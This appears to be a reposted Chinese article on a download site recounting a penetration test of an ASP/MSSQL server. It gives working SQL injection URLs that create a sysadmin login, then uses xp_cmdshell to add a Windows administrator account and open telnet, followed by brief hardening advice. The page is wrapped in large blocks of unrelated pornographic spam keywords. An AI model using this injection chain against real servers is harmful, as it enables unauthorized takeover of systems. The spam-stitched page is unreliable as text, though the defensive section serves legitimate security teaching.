在线看毛片视频-国产免费av在线-欧美日韩一区二区三区-国产成人无码av在线播放无广告-亚洲人va欧美va人人爽-国产第一草草-西班牙黄色片-四虎在线网站8848-最新av片免费网站入口-东京热无码中文字幕av专区-日本大人吃奶视频xxxx-欧美精品一区二区三区四区五区-国产片天天弄-国产免费内射又粗又爽密桃视频-欧美爱爱网站-日韩v欧美

當前位置:雨林木風下載站 > 安全殺毒教程 > 詳細頁面

從一次滲透測試談起

從一次滲透測試談起

更新時間:2025-10-13 文章作者:未知 信息來源:網絡 閱讀次數:

網絡技術是從1990年代中期發展起來的新技術,它把互聯網上分散的資源融為有機整體,實現資源的全面共享和有機協作,使人們能夠透明地使用資源的整體能力并按需獲取信息。資源包括高性能計算機、存儲資源、數據...
網絡技術是從1990年代中期發展起來的新技術,它把互聯網上分散的資源融為有機整體,實現資源的全面共享和有機協作,使人們能夠透明地使用資源的整體能力并按需獲取信息。資源包括高性能計算機、存儲資源、數據資源、信息資源、知識資源、專家資源、大型數據庫、網絡、傳感器等。 當前的互聯網只限于信息共享,網絡則被認為是互聯網發展的第三階段。

一 滲透的具體過程
朋友做了一個財務部門的項目,今天叫我來做免費的滲透測試,下面來談談這
次的過程和體會。

先來介紹一下子服務器的基本情況,windows 2000 adv server 中文版,據稱
打過了sp3,asp+iis+mssql 。首先掃描了一下子端口,呵呵,開始的一般步驟。

端口21開放: FTP (Control)
端口80開放: HTTP, World Wide Web
端口135開放: Location Service
端口139開放: NETBIOS Session Service
端口1433開放: Microsoft-SQL-Server

開了幾個很經典的端口,應該說個個都很經典啊。既然確定好了端口,那就有
針對性地掃描一下看看開了什么共享么,faint,老兄把ipc$,admin$,c$,d$都
給關掉了,掃描nt的弱口令就沒有實際意義了。然后呢就看看iis是否有什么
漏洞,用x_scan掃了一下,沒有發現什么可以利用的漏洞。然后就來看看1433
的sql是否有什么漏洞,首先掃了一下弱口令,沒有,先還是不暴力破解吧,一
般都是先禮后兵的,暴力的就留到最后了。最近sql server 有個Resolution服
務遠程棧緩沖區溢出漏洞,用這個來看看,試了一下子不行。原因可能是因為
我用的exploit對sp3不適用或者是已經做了安全設置。不過這問題還是先記錄
下來了。
再來看看ftp怎么樣,
C:\Documents and Settings\Administrator>ftp 1.1.1.1
Connected to 1.1.1.1.
220 cwcserver Microsoft FTP Service (Version 5.0).
User (1.1.1.1:(none)): anonymous
331 Password required for anonymous.
Password:
530 User anonymous cannot log in.
Login failed.
ftp>
失敗了。不支持匿名登陸的,不過這里也是一個安全隱患,可以通過暴力破解
ftp用戶的密碼來破解nt用戶的密碼。也記錄下來了。好了,既然用了asp+sql
那就來看看asp編程方面有沒有可以利用的東西了。到主頁上面一看,有個新聞
發布系統。url如下:
http://1.1.1.1/news/default.asp?cataid=98986
先加個分號測試一下,url現在如下:
http://1.1.1.1/news/default.asp?cataid=98986;
依然正常顯示,并且和前面顯示完全一樣。這說明了沒有過濾分號,大好消息。
再測試一下子單引號。現
在的url如下:
http://1.1.1.1/news/default.asp?cataid=98986‘
頁面正常顯示,不過不能夠顯示新聞列表。提示找不到資料。這說明單引號也沒
有過濾。好了,希望大大的有了。估計xp_cmdshell也可以了,其他的存儲過程
也都可以用了。不過這里這臺服務器是關掉了所有的默認的共享。

想想有什么好辦法能夠獲得shell呢。仔細考慮后我想到了兩種方法,基本上是
大同小異。

方法一:
利用xp_cmdshell存儲過程來添加windows用戶,并提升到管理員權限。
然后依然利用xp_cmdshell來打開telnet服務。最后當然是登錄上去了。

方法二:
利用sp_addlogin添加sql用戶,同樣還要提升權限。
再用查詢分析器連接SQL Server,再利用xp_cmdshell打開telnet服務。
最后登錄。

兩種方法都能夠得到shell,我就選擇第二種方法。具體過程如下:


就往SQL Server里面添加一個用戶吧。
方法如下:http://1.1.1.1/news/default.asp?cataid=98986;use master;exec dbo.sp_addlogin user;
回車后執行,瀏覽器自動補上了空格,變成:
http://1.1.1.1/news/default.asp?cataid=98986;use%20master;exec%20dbo.sp_addlogin%20user;
頁面依然正常顯示,不過就算你打錯了也會正常顯示的,不能夠判斷究竟是
否成功。中間的20%嗎,其實就是代表空格符的。上面也就相當于在查詢分
析器里面執行:
use master;
dbo.sp_addlogin user;注:此處也可以為sp_addlogin user;前面的url里
面同樣可以不要dbo,也就是:
http://1.1.1.1/news/default.asp?cataid=98986;use master;exec sp_addlogin%20user;
都是一樣的。
現在我們已經添加了一個用戶了,密碼現在為空,這里就不管這么多了,反正也是
一個過渡的過程,就不加密碼了。
如果要改密碼,可以這樣:dbo.password null,password,user;
dbo.password是修改用密碼的存儲過程,null是舊密碼,password是新密碼,
user自然就是用戶名了。而在我們這個測試中也就是這樣子的:
http://1.1.1.1/news/default.asp?cataid=98986;use master;exec dbo.password null,password,user;

ok,回到主題,現在權限還是不夠高,那么就開始提升權限吧,url如下:
http://1.1.1.1/news/default.asp?cataid=98986;use master;exec dbo.sp_addsrvrolemember user,sysadmin;
解釋一下sysadmin的含義。SQL Server有八種固定服務器角色,具體如下:數據
庫創建者(DBCREATOR),磁盤管理員(DISKADMIN),進程管理員(PROCESSADMIN),
安全管理員(SECURITYADMIN),服務器管理員(SEVERADMIN)安裝管理員(SETUPADMIN)
,系統管理員(SYSADMIN),大容量管理員(BULKADMIN)當然最高權限的是系
統管理員(SYSADMIN),默認情況下sa也是系統管理員。
dbo.sp_addsrvrolemember是為固定服務器角色分配登錄帳戶的存儲過程。

用大家經常使用的net命令來對應(本身并沒有任何聯系,這里拿來對照學習)
sp_addlogin user;相當于 net user user /add
sp_password null,password,user相當于net user user password
sp_addsrvrolemember user,sysadmin相當于net localgroup administrators user /add


好了,我們現在已經實現了添加用戶并且提升到sysadmin了。下面要做的是添加windows用戶并且
開啟telnet服務。
打開我的查詢分析器,填入服務器地址,用戶民和密碼。連接成功了。嘗試一下xp_cmdshell是否
可以使用,
use master;
xp_cmdshell ‘dir c:‘;
記得分號是不可以少的哦。一切正常。顯示出來了c:盤下的目錄和文件。那就繼續下去,
添加windows用戶:
xp_cmdshell ‘net user awen /add‘;
設置好密碼:
xp_cmdshell ‘net user awen password‘;
提升到管理員:
xp_cmdshell ‘net localgroup administrators awen /add‘;
開啟telnet服務:
xp_cmdshell ‘net start tlntsvr‘
一個老問題就是還有ntlm這個攔路虎。
沒問題,直接在肉雞上也添加一個用戶名和密碼相同的賬號然后再以這個帳號運行cmd就可以了。
具體的做法-----為cmd.exe創建一個快捷方式,右鍵點擊,在“屬性”里面鉤上“以其他用戶身
份運行”。ok,雙擊。輸入剛才的用戶名和密碼。更加詳細的做法清查看阿布的文章----
最快速登錄WIN2K TELNET 服務,在這里可以找到.
http://www.patching.net/abu/gongfang/hacking/easytelnet/index.html

好了,可以telnet上去了,就寫到這里,后面還進行了一些測試,都是大家所熟悉的就不寫了。

 

二 回顧與思考

 

這次入侵測試要是說有難點的話那就是管理員把ipc$,admin$,c$,d$...都關掉了。
因此和以前很多的教程有點不同。比如說假設ipc$沒有關閉的話,我們很輕松的
使用opentelnet這個工具來開telnet,并且也就沒有了ntlm這個障礙。

再對前面的兩種方法進行回顧,其實兩種方法還是有區別的。
假如管理員把xp_cmdshell禁止了,第一種方法就無法進行下去了。
有人會說,第二種方法不是也一樣要用到xp_cmdshell嗎。
正確,不過我們還是有辦法恢復過來。SQL server 2000的恢復方法是:
EXEC sp_addextendedproc xp_cmdshell ,@dllname =‘‘xplog70.dll‘‘ 
SQL Server 7.0的恢復方法是:
EXEC sp_addextendedproc xp_cmdshell ,@dllname =‘‘xpsql70.dll‘‘ 
你在2000下面是找不到xpsql70.dll的,同樣7.0下面也是找不到xplog70.dll。
把第二種方法也寫出來,沒有測試,僅供大家參考:
1 添加用戶
http://1.1.1.1/news/default.asp?cataid=98986;use master;exec dbo.xp_cmdshell‘net user awen /add‘;
2 更改密碼
http://1.1.1.1/news/default.asp?cataid=98986;use master;exec dbo.xp_cmdshell‘net user awen password‘;
3 提升到管理員權限
http://1.1.1.1/news/default.asp?cataid=98986;use master;exec dbo.xp_cmdshell‘net localgroup administrators awen /add‘;
4 打開telnet服務
http://1.1.1.1/news/default.asp?cataid=98986;use master;exec dbo.xp_cmdshell‘net start tlntsrv‘;
5 依然是采用前面相同的方法登錄

 


三 就本例談談怎樣進行安全防范

 

上面所講的是一個特定的例子,但是反應了一個問題,世界上沒有絕對的安全。
安全是有很多很多細節所組成起來的。上面例子中的管理員已經做了一些必要的安全措施。
補丁打得也很及時,但是依然存在著很大的問題。不僅僅是asp沒有過濾掉特殊字符。還有一些
比較嚴重的問題,比如說開啟了ms ftp服務,這樣入侵者就可以通過暴力破解ftp密碼來獲得
windows的密碼。
如果要談2000的安全設置,要寫上厚厚的一本書也可以。下面僅僅就這個例子中來談談。

asp編程要注意的一些問題: 
1 涉及用戶名與口令的程序最好封裝在服務器端,盡量少的在ASP文件里出現,
2 涉及到與數據庫連接地用戶名與口令應給予最小的權限。如本例,事后問了朋友,
他使用的是sa用戶,因此我能夠運行很多的存儲過程。
3 屏蔽很多特殊字符,如; ‘這種危險的字符必須要給過濾掉。
4 在處理類似留言板、BBS等輸入框的ASP程序中,最好屏蔽掉HTML、javascript、VBScript
語句,如無特殊要求,可以限定只允許輸入字母與數字,屏蔽掉特殊字符。同時對輸入字符
的長度進行限制。而且不但在客戶端進行輸入合法性檢查,同時要在服務器端程序中進行類
似檢查。
5 要使用access的話,千萬注意到保護好你的mdb文件,別讓別人下載。 

SQL SERVER的安全
本例中SQL SERVER的設置也存在著很多的問題。比如很多存儲過程沒有drop,是這次入侵中的
功臣,也是安全的極大的隱患。
1 使用安全的密碼策略
2 及時更新補丁程序。 
 與windows一樣,SQL SERVER的許多漏洞會由補丁程序來彌補。建議在安裝補丁程序之前先
在測試機器上做測試,同時提前做好目標服務器的數據備份。而很多管理員往往不注意給SQL 
SERVER打補丁。最近就有Resolution服務遠程棧緩沖區溢出漏洞,很多站點都沒有注意到。
3 嚴格控制數據庫用戶的權限,輕易不要給讓用戶對表有直接的查詢、更改、插入、刪除權限,
可以通過給用戶以訪問視圖的權限,以及只具有執行存儲過程的權限。在上面也提到了。
4 把危險的和不必要的存儲過程刪除,
xp_cmdshell,很危險的一個存儲過程,能夠執行dos命令,可以通過下述SQL語句
use master 
sp_dropextendedproc ‘xp_cmdshell‘ 
不過依然可以通過sp_addextendedproc來恢復,因此最好刪除或改名xplog70.dll(sql server 2000)
xpsql70.dll(sql serer 7.0)
以下存儲過程也很危險
xp_fileexist,用來確定一個文件是否存在。 xp_getfiledetails,可以獲得文件詳細資料。 
xp_dirtree,可以展開你需要了解的目錄,獲得所有目錄深度。 Xp_getnetname,可以獲得
服務器名稱。 
去掉不需要的注冊表訪問的存儲過程,如下: 
Xp_regaddmultistring Xp_regdeletekey Xp_regdeletevalue Xp_regenumvalues 
Xp_regread Xp_regremovemultistring Xp_regwrite
如果你不需要請丟棄OLE自動存儲過程,這些過程包括如下: 
Sp_OACreate Sp_OADestroy Sp_OAGetErrorInfo Sp_OAGetProperty 
Sp_OAMethod Sp_OASetProperty Sp_OAStop 

網絡的神奇作用吸引著越來越多的用戶加入其中,正因如此,網絡的承受能力也面臨著越來越嚴峻的考驗―從硬件上、軟件上、所用標準上......,各項技術都需要適時應勢,對應發展,這正是網絡迅速走向進步的催化劑。

溫馨提示:喜歡本站的話,請收藏一下本站!

本類教程下載

系統下載排行

在线看毛片视频-国产免费av在线-欧美日韩一区二区三区-国产成人无码av在线播放无广告-亚洲人va欧美va人人爽-国产第一草草-西班牙黄色片-四虎在线网站8848-最新av片免费网站入口-东京热无码中文字幕av专区-日本大人吃奶视频xxxx-欧美精品一区二区三区四区五区-国产片天天弄-国产免费内射又粗又爽密桃视频-欧美爱爱网站-日韩v欧美
  • <li id="86scu"><menu id="86scu"></menu></li>
    <li id="86scu"></li>
    <button id="86scu"></button>
  • <s id="86scu"></s><button id="86scu"><menu id="86scu"></menu></button>
  • www在线观看免费| 亚洲黄色网址在线观看| 欧妇女乱妇女乱视频| 免费在线观看污网站| 亚洲欧美自拍另类日韩| 手机看片福利盒子久久| 女人另类性混交zo| 成人一区二区三| 日韩精品一区中文字幕| www.玖玖玖| 久久久一本二本三本| www.com毛片| 欧美黑人又粗又大又爽免费| 免费黄色特级片| 一道本在线免费视频| aaa一级黄色片| 小泽玛利亚av在线| 国产人妻777人伦精品hd| 欧美视频在线观看网站| 国产人妻777人伦精品hd| 日本一道本久久| 欧美精品aaaa| 潘金莲一级淫片aaaaa免费看| 伊人成人免费视频| 91.com在线| 91蝌蚪视频在线观看| 五月六月丁香婷婷| xxxx18hd亚洲hd捆绑| wwwwxxxx日韩| 丰满人妻一区二区三区53号| 五十路熟女丰满大屁股| 免费国产成人av| 日韩 欧美 自拍| 99久久久无码国产精品6| www.成人黄色| 国产一区二区三区精彩视频| 污污的视频免费| 久草视频国产在线| www.com久久久| 久久国产成人精品国产成人亚洲| 日本美女高潮视频| 欧美 日韩 国产精品| 欧美日韩第二页| 特大黑人娇小亚洲女mp4| 一区二区在线播放视频| 日韩视频在线视频| 97超碰人人看| 玩弄japan白嫩少妇hd| 大桥未久一区二区三区| 国产嫩草在线观看| 男人操女人逼免费视频| 佐佐木明希av| 精品亚洲视频在线| 亚洲色图 在线视频| 香港三级韩国三级日本三级| 国产精品88久久久久久妇女| 亚洲国产精品三区| 四季av一区二区| 国产综合免费视频| 99爱视频在线| 18禁免费观看网站| 99热亚洲精品| 97超碰在线人人| 丰满的少妇愉情hd高清果冻传媒| 中文字幕第一页亚洲| 中文字幕在线视频一区二区三区| 天天色综合天天色| 美女黄色片视频| 九九九在线观看视频| 午夜免费福利在线| 黄色一级片免费的| 北条麻妃亚洲一区| 熟女熟妇伦久久影院毛片一区二区| 亚洲欧美日韩一级| 国产精品久久久久久9999| 伊人色在线观看| 国产系列第一页| 国产视频在线观看网站| 欧美午夜小视频| 黄色片一级视频| 日韩不卡一二三| 青娱乐国产精品视频| 99精品视频网站| bt天堂新版中文在线地址| 日韩a∨精品日韩在线观看| 国产精品va无码一区二区| 少妇高清精品毛片在线视频| 中文字幕第88页| 欧美 亚洲 视频| 无码人妻h动漫| 亚洲第一天堂久久| 青青草视频在线免费播放| 久久久免费视频网站| 日韩在线一区视频| www.亚洲视频.com| 少妇黄色一级片| 精品人妻人人做人人爽| 日本999视频| 奇米777四色影视在线看| 日韩avxxx| 9191国产视频| 色播五月综合网| 国产精品久久..4399| 午夜一区二区视频| a√天堂在线观看| 手机精品视频在线| 日韩av一二三四| 国产精品日韩三级| 青青草久久伊人| 久久精品免费一区二区| 色香蕉在线观看| 在线观看高清免费视频| 男人日女人逼逼| av 日韩 人妻 黑人 综合 无码| 日本男人操女人| 成人一区二区免费视频| 亚洲综合123| 日本黄色福利视频| 日韩免费高清在线| 青青艹视频在线| 免费不卡av在线| 老司机午夜免费福利视频| 亚洲欧美日韩综合网| 日韩在线第三页| 成人免费在线小视频| 国产高清av在线播放| 日本高清视频免费在线观看| 91 视频免费观看| 国产探花在线看| 九九热免费在线观看| wwwwxxxx日韩| 中国黄色片免费看| 亚洲欧美自偷自拍另类| 韩国一区二区av| 国产av人人夜夜澡人人爽| 日韩毛片在线免费看| 国产又大又硬又粗| 国产三级日本三级在线播放| 蜜臀av午夜一区二区三区| 无码人妻精品一区二区三区在线| 国产一线二线三线女| 99久久国产综合精品五月天喷水| 丁香色欲久久久久久综合网| 无码av天堂一区二区三区| 国产av天堂无码一区二区三区| 日本免费a视频| 免费黄色福利视频| 久久综合伊人77777麻豆最新章节| 一区二区在线播放视频| 午夜精品中文字幕| 亚洲精品国产suv一区88| 国产午夜福利100集发布| www.com毛片| www激情五月| 成人在线视频一区二区三区| www.国产在线播放| www.xxx亚洲| 欧美一级中文字幕| 欧美激情国产精品日韩| 国产乱女淫av麻豆国产| 欧美在线观看黄| 中文字幕一区二区三区四区在线视频| www.国产视频.com| 欧美精品卡一卡二| 亚洲国产精品三区| 欧美视频在线观看视频| 乱子伦视频在线看| 欧美日韩午夜爽爽| 日韩av片网站| www.av91| av动漫免费观看| 爱福利视频一区二区| 日本福利视频导航| 韩国中文字幕av| 中国丰满熟妇xxxx性| 精品亚洲视频在线| 日韩精品一区二区三区色欲av| 午夜探花在线观看| 亚洲精品视频导航| 免费无遮挡无码永久视频| 一道本在线观看视频| 国产一线二线三线在线观看| 国产青青在线视频| 97超碰在线视| 精品少妇人妻av一区二区| 国产一二三区av| 成人免费无码av| 国产精品-区区久久久狼| 可以在线看黄的网站| 一区二区三区欧美精品| av免费网站观看| 亚欧无线一线二线三线区别| 黄色a级片免费看| 欧美日韩dvd| 精品一区二区三区毛片| 中国一级黄色录像| 午夜啪啪福利视频| 看全色黄大色大片| 日韩不卡视频一区二区| 最新av在线免费观看|